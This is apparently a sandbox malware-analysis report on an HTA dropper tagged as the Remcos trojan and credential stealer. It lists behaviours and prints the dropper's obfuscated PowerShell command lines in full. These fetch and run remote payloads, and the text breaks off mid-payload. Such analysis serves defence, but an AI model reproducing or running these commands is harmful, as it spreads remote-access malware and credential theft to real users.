Malware Analysis Report

2024-12-07 22:14

Sample ID 240806-kwpbfavepn
Target INET.hta
SHA256 f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46
Tags
defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46

Threat Level: Known bad

The file INET.hta was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer

Remcos

NirSoft WebBrowserPassView

Credentials from Password Stores: Credentials from Web Browsers

NirSoft MailPassView

Detected Nirsoft tools

Command and Scripting Interpreter: PowerShell

Evasion via Device Credential Deployment

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 08:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 08:57

Reported

2024-08-06 08:59

Platform

win7-20240729-en

Max time kernel

118s

Max time network

118s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INET.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2972 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2972 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2972 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2224 wrote to memory of 1660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2224 wrote to memory of 1660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2224 wrote to memory of 1660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2224 wrote to memory of 1660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2972 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2576 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INET.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r6hwciqb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE86D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE86C.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷LwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cgB2⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷dwBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bu⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷LgBj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷cg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YgBz⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷agBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷ZQBi⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bgB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB3⤏ ꒼ ⛲ ⫰ 〷C0⤏ ꒼ ⛲ ⫰ 〷TwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷VwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgB5⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷ew⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷dwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBE⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dwBu⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷R⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQ⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷aw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷fQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BX⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷aQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LQBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷JwBG⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bwB3⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bm⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷ZwBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBu⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷ZQBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷UwB5⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷LgBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷RQBu⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷bwBk⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷Og⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷FU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Dg⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ 